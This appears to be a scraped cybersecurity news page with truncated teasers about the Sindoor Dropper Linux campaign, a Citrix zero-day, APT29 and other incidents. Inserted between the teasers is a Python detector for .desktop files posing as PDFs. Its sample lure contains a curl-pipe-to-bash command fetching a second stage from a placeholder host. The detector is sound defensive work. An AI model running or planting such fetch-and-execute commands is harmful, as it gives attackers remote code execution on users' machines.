Red Hot Cyber
Cybersecurity is about sharing. Recognize the risk, combat it, share your experiences, and encourage others to do better than you.

Author: Redazione RHC

Sindoor Dropper: The Malware Using the India-Pakistan Clash to Infect Linux

An insidious malware attack known as “Sindoor Dropper” targets Linux operating systems, leveraging spear-phishing and a multi-stage infection chain. The operation targets users with lures related to the recent Pakistan-India conflict, known as Operation Sindoor, to trick them into activating malicious files. The Sindoor Dropper campaign highlights an evolution in threat actors’ techniques, demonstrating a clear focus on Linux environments, which are less often targeted by phishing campaigns. The attack begins when a user opens a malicious .desktop file, named “Note_Warfare_Ops_Sindoor.pdf.desktop”, which masquerades as a regular PDF document. According to the analysis by Nextron Systems, once executed, it
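A triage check for the lure type described above, added here as an example and not taken from the article or from Nextron's analysis: it parses a .desktop entry and flags the combination of a document-style Name, filename or icon with an Exec line that runs a shell, interpreter or downloader, which is what lets a launcher pass for a PDF. The two sample entries, the Exec command and the example.invalid host are constructed for illustration; the real dropper's command line is not on the page.

```python
"""Heuristic triage of .desktop files that pose as documents (added example)."""
import configparser
import re
from pathlib import Path

# Constructed sample lure. The filename follows the pattern named in the
# article; the Exec line is an assumption for illustration, not the real
# Sindoor Dropper command.
SAMPLE_LURE_NAME = "Note_Warfare_Ops_Sindoor.pdf.desktop"
SAMPLE_LURE = """[Desktop Entry]
Type=Application
Name=Note_Warfare_Ops_Sindoor.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "curl -fsSL http://example.invalid/stage2 | bash"
"""

# Constructed benign launcher for comparison.
BENIGN_NAME = "org.gnome.TextEditor.desktop"
BENIGN = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=accessories-text-editor
Terminal=false
Exec=gnome-text-editor %U
"""

DOC_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?|odt|txt)$", re.IGNORECASE)
DOC_ICON = re.compile(r"^(application-pdf|x-office-document|libreoffice-|text-x-)", re.IGNORECASE)
# Shells, scripting interpreters and download tools one would not expect in a document viewer's Exec line.
INTERPRETER = re.compile(r"(^|[\s\"'/])(ba|z|da)?sh\b|\b(python3?|perl|curl|wget|base64)\b")


def parse_desktop_entry(text: str) -> dict:
    """Parse the [Desktop Entry] group; keys are case-sensitive per the spec."""
    parser = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    parser.optionxform = str  # keep 'Exec' rather than lowercasing to 'exec'
    parser.read_string(text)
    return dict(parser["Desktop Entry"]) if "Desktop Entry" in parser else {}


def lure_indicators(text: str, filename: str = "") -> list:
    """Return the reasons a .desktop entry looks like a document-masquerading lure."""
    entry = parse_desktop_entry(text)
    if not entry:
        return []
    name = entry.get("Name", "")
    icon = entry.get("Icon", "")
    exec_line = entry.get("Exec", "")
    reasons = []
    # Path(...).stem strips the trailing ".desktop", exposing a ".pdf" double extension.
    if DOC_EXT.search(name) or (filename and DOC_EXT.search(Path(filename).stem)):
        reasons.append("document extension in Name or filename (double extension)")
    if DOC_ICON.search(icon):
        reasons.append("document icon on an Application entry")
    if INTERPRETER.search(exec_line):
        reasons.append("Exec runs a shell, interpreter or downloader")
        # Terminal defaults to false, so an absent key hides the shell as well.
        if entry.get("Terminal", "false").lower() == "false":
            reasons.append("Terminal=false hides the shell window from the user")
    return reasons


def is_lure(text: str, filename: str = "") -> bool:
    """Flag only when a document disguise coincides with script execution."""
    reasons = lure_indicators(text, filename)
    disguise = any("extension" in r or "icon" in r for r in reasons)
    executes = any(r.startswith("Exec runs") for r in reasons)
    return disguise and executes


if __name__ == "__main__":
    for fname, text in ((SAMPLE_LURE_NAME, SAMPLE_LURE), (BENIGN_NAME, BENIGN)):
        verdict = "LURE" if is_lure(text, fname) else "ok"
        print(f"{fname}: {verdict} {lure_indicators(text, fname)}")
```

Requiring both a disguise indicator and an execution indicator keeps ordinary launchers (which legitimately run interpreters, or legitimately use document icons) out of the alert queue; the same check can be run over files dropped into ~/Desktop, ~/Downloads and ~/.local/share/applications.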

Iranian cyber attacks disrupt Gaza ceasefire negotiations

Mediation efforts led by Arab nations to secure the release of Israelis held by Hamas and a ceasefire in Gaza have been disrupted by cyber attacks from Iran, a cybersecurity firm said. As reported yesterday in the article highlighting the attacks discovered by the firm, the Israeli company Dream says Iranian operators infiltrated diplomatic networks in the Middle East during the ceasefire negotiations in Cairo and compromised sensitive international communications. The spear-phishing campaign, disguised as a communication from the Omani Ministry of Foreign Affairs, was carried out by the Homeland Justice group associated with Iran’s Ministry of Intelligence and Security, it said. The email

Let the hunt begin! Hackers exploit Citrix flaw to infiltrate global systems

A critical zero-day flaw, tracked as CVE-2025-6543, has been discovered in Citrix NetScaler systems. The vulnerability has been actively exploited by malicious hackers since May 2025, before a fix was made available. Citrix initially described it as a memory overflow that could cause unintended control flow and denial of service, but it later emerged that the flaw actually allows unauthenticated remote code execution (RCE), potentially resulting in widespread compromise. The bug allows an attacker to overwrite memory by providing a malicious client certificate to the /cgi/api/login endpoint on a vulnerable NetScaler

The Pentagon launches an audit of Microsoft. It investigates Chinese engineers and alleged backdoors.

The Pentagon has sent a “letter of concern” to Microsoft documenting a “breach of trust” regarding the company’s use of Chinese engineers to maintain sensitive government computer systems, Defense Secretary Pete Hegseth announced this week. At the same time, the Department of Defense is launching an investigation into whether any of these employees compromised national security. “The use of Chinese nationals to maintain Department of Defense cloud environments is over,” Hegseth said in a video statement. “We have sent a formal letter of concern to Microsoft documenting this breach of trust and are requesting a third-party audit of Microsoft’s digital escort program,

Amazon Stops APT29: Sophisticated Russian Watering Hole Campaign Foiled

A watering hole campaign orchestrated by APT29, the hacker group linked to Russia’s foreign intelligence service, was neutralized by Amazon’s security team. The campaign marks a significant tactical shift from previous operations, demonstrating the group’s ability to evolve under pressure from defenders. Unlike the October 2024 campaign, which relied on impersonating an AWS domain to distribute malicious Remote Desktop Protocol files, APT29’s new approach involved compromising legitimate websites and injecting obfuscated JavaScript into them. The injected code redirected visitors to convincing fake Cloudflare verification pages on domains such as findcloudflare[.]com, designed to trick users into authorizing attacker-controlled devices through Microsoft’s device code authentication flow. The

The best defense is a good offense! Google is ready to launch cyber attacks against criminal hackers.

Google is poised to adopt a more proactive stance to protect itself, and potentially other U.S. organizations, from cyberattacks, with the company suggesting it may take on the role of attacker in the digital realm. Google plans to form a “proactive countermeasures team” to combat cybercriminals in the coming months, said Sandra Joyce, vice president of the Google Threat Intelligence Group. “At the Google Threat Intelligence Group, we are proactively identifying opportunities to disrupt campaigns or operations. We will need to shift from a reactive to a proactive posture if we want to make a difference right now.” This was stated during an

A zero-click exploit for WhatsApp allowed remote surveillance. Meta warns victims.

A security flaw in WhatsApp’s messaging apps for Apple iOS and macOS has been patched, the company reported, after likely being exploited, chained with a recently disclosed Apple vulnerability, in targeted zero-day attacks. Incomplete authorization of linked-device synchronization messages is behind the vulnerability, tracked as CVE-2025-55177 (CVSS score 8.0), which has been exploited by surveillance software (spyware). The bug was discovered, and its impact subsequently reassessed, by WhatsApp’s own security team. Donncha Ó Cearbhaill, head of Amnesty International’s Security Lab, said WhatsApp has alerted an unknown number of individuals it believes were

Google warns 2.5 billion Gmail users: account security at risk. Reset your password!

A far-reaching security advisory has been issued by Google to the 2.5 billion users of its Gmail service, aiming to strengthen the protection of their accounts following a data breach affecting one of the company’s third-party Salesforce-based systems. The incident, which occurred in June 2025, has heightened concerns about sophisticated phishing operations targeting a broad audience of users. This is one of the largest mass security alerts Google has sent. Although many users choose complex passwords, only about a third update them regularly, leaving countless accounts exposed, especially those without MFA. In June, a cybercriminal group identified as UNC6040,

Moscow hires hackers who attacked the Electronic School in 2022 to improve it

Participants in the cyberattack on the Moscow Electronic School were offered work improving cybersecurity and other digital services of the capital’s administration. This follows the events of September 17, 2022, when students and teachers were unable to upload assignments, assign grades, or use the platform’s services for three days because of a hacker attack.

Talent recruitment

Moscow authorities hired the hackers after their cyberattack on the Moscow Electronic School (MES) platform, RBC writes. According to Moscow Deputy Mayor Anastasia Rakova, the participants in the MES cyberattack have received an offer to work on improving cyber defense and other digital services of the capital’s

Want a free PDF editor? You downloaded malware included in the premium package.

A malware campaign has been discovered targeting users searching for free PDF editing software: a malicious application disguised as a legitimate “AppSuite PDF Editor” is being spread by cybercriminals. The threat actors behind the campaign have shown unprecedented boldness by submitting their malware to antivirus companies as a false positive, in an attempt to have the detections removed. The installer, built with the open-source WiX toolset, downloads the actual PDF editor program from vault.appsuites.ai immediately after execution and acceptance of the End User License Agreement. The malware, packaged as a Microsoft Installer (MSI) file, is distributed via high-profile websites designed